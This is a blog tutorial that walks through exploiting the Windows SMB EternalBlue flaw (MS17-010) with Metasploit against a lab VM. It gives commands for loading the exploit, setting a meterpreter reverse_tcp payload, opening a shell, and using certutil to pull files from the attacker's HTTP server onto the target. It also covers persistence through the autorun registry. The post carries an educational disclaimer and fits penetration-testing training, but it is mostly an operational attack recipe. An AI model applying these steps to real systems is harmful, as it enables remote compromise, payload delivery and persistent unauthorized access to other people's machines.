Exploiting Windows SMB Module Vulnerability using “Eternal Blue” Exploit, Metasploit.

Muhammad Huzaifa
7 min readFeb 27, 2023

--

Gaining remote access to another operating system, for a penetration tester its like a dream come true. This blog will cover exploiting a very famous and common vulnerability “Eternal Blue” for getting a reverse shell for windows system and remotely executing commands and payloads on the target machine using Metasploit framework. Before actually getting to exploitation phase let’s just have a look at “What eternal blue really is?”.

What is Eternal Blue?

Eternal Blue is basically an exploit developed by united state’s National Security Agency and was revealed by a group of hackers who went by the name “shadow brokers” on April 14, 2017. Different Versions of Windows i.e., windows vista, 7, 8.1, RT 8.1, windows server 2008, 2008 R2, 2012, 2012 R2 and even windows 10 are vulnerable to this exploit. So, How does it Work? Eternal Blue exploits a vulnerability in SMB (Server Message Block) modules’ implementation into authorizing malicious packets into the legitimate network. Now that we have a understanding of how this exploit works let’s get to the practical of exploitation phase.

Pre — Requisites

1- Any version of windows either 10, 8.1, 7 or windows server 2008 or 2012 acting as your target VM.

2- Kali Linux with updated Metasploit Framework.

3- we need to run both virtual environments at the same time so a minimum of 8Gb RAM is a must.

Note:

Use only virtual Environments for this exploitation and not your own host machines. I for this blog will be using windows 7 as my Target virtual environment and kali Linux 2022 as my attack box, however you can use any windows machine from the ones mentioned above.

Disclaimer

It is clearly being stated that this blog can only be used for educational purposes and for penetration testing enthusiasts and the author of this blog will not be responsible for any malicious activities carried out using the information provided in this blog.

Getting Started

The very 1st step is to open both of your virtual environments and set them on Bridged adapters, since we are not going to use any third party softwares like Ngrok , we should have both of our VMs at bridged network.

Click Settings -> Click Network -> Set Bridged Adapter

After Running the Windows 1st of all turn the windows defender off from your Windows to get rid of any later confusions. You can follow the following short You Tube video on how to turn off your defender if you don’t already know:

Windows® 7: How to turn off the security on Windows® 7-based PC — YouTube

Now run the following command on your Kali Linux machine to start Metasploit Framework:

“msfconsole”

your Metasploit framework should start running and you should have something like this:

It may take some time at 1st, so just let the framework start.

Now, when the framework is up search for the eternal blue vulnerability and any exploit related to it using the following command:

“search eternal” or “search eternal blue”

You will have a few of the exploits related to this vulnerability as shown in the screenshot below:

Now that we know that the exploit we are pursuing exploits the SMB module of windows architecture, pick the 1st exploit with id 0 highlighted in the screenshot above and write it with the “use” command to get into the exploit module:

“use exploit/windows/smb/ms_17_010_eternal blue”

Now you should have entered into the exploit module as shown below

The 1st option after entering the module is to check for the module options that what features have already been provided by the exploit. For this purpose, use “show options” command

Remember this boxed Payload option, this will be used in setting payload later.

you can see a number of options already provided by the exploit to set in order to run the exploit. The good thing is we don’t need to set all the options. We just need to set the target, remote host(IP address of your windows) and payload for the exploit to work and run it.

“set target 0”

“set RHOST<IP address of you bridged windows>”

Now, if some people have any issue (if after using remote hosts command) your connection is not set up, use set LHOSTcommand to set your local for windows to connect to and “set LPORT” command for setting up port.

set LHOST <your Kali’s IP Address>

set LPORT <open port number to listen for connection>

Now the last step is to just set the payload for the exploit. If you remember we highlighted a payload in show options command above. Copy that payload and use with the following command:

“set payload windows/x64/meterpreter/reverse_tcp”

Now just simply run the exploit using either

“exploit” or “run”

command. the exploit should start listening on the set port for the remote host you set above as shown below:

Viola! We got connected to the windows through a reverse shell, as you can see in the screenshot below that we have sustained a meterpreter session with windows. You can use the help command to check the possible meterpreter commands available for windows:

Now, the 1st step after opening a session to the windows is using “shell” command to get a raw shell of the operating system you have connected to.

Now you can get any command executed on the target windows machine as I have used this “sysinfo” command to get system information.

There are unlimited number of commands you can now use on the target system. Furthermore, you can download any file either malicious or benign onto the target system easily. Just create your python http server using command:

“python -m http.server 4444”

upload any files on this http server and use the following command in your meterpreter session to download it on the target machine.

“certutil.exe -urlcache -f http://<IP Address of Kali>:4444(port set in above command)/file uploaded on the http server <anyfile.exe>”

Persistence

There are many cases that when the target machine reboots the system the meterpreter session for the target also gets disconnected. To stop this we have a really beautiful module in Metasploit framework that goes by “persistence”. This module basically adds the file provided at the path set in the module in the autorun repository of the target machine, hence even if the target reboots the system, the payload on target machine tries to connect to the meterpreter session every ___ seconds. These seconds are also set in the persistence module.

1st of all background your current session using “background” command and get back to msf shell. and Use the following commands to enter the persistence modules.

“use exploit/windows/local/persistence”

“show options”

Now you can set the file you want to add to the autorun registry, path to the file, delay seconds after which the victim will try to reconnect to the session and the session id with which the victim will connect. Use the following commands:

“set DELAY 30” ; try to connect every 30 seconds

set EXE_NAME <file you want to add to auto run>

set PATH <path to the file to add to autorun>

set SESSION <id of active meterpreter session usually 1>”

Wait for the exploit to complete.

Now interact with your active meterpreter session using “sessions -i session id” command and “reboot” the target system. And you will see that even after rebooting the system your meterpreter still has an active connection with you target system.

Conclusion

This blog shows how easy Metasploit framework makes it to exploit any common vulnerabilities and eternal blue is not the only vulnerability that is this easy to exploit using this framework. There are many other like “netapi” and other auxiliary exploits. This shows how vulnerable today’s systems still really are and how one can make use of these vulnerabilities to get his/ her way with another’s operating system.

--

--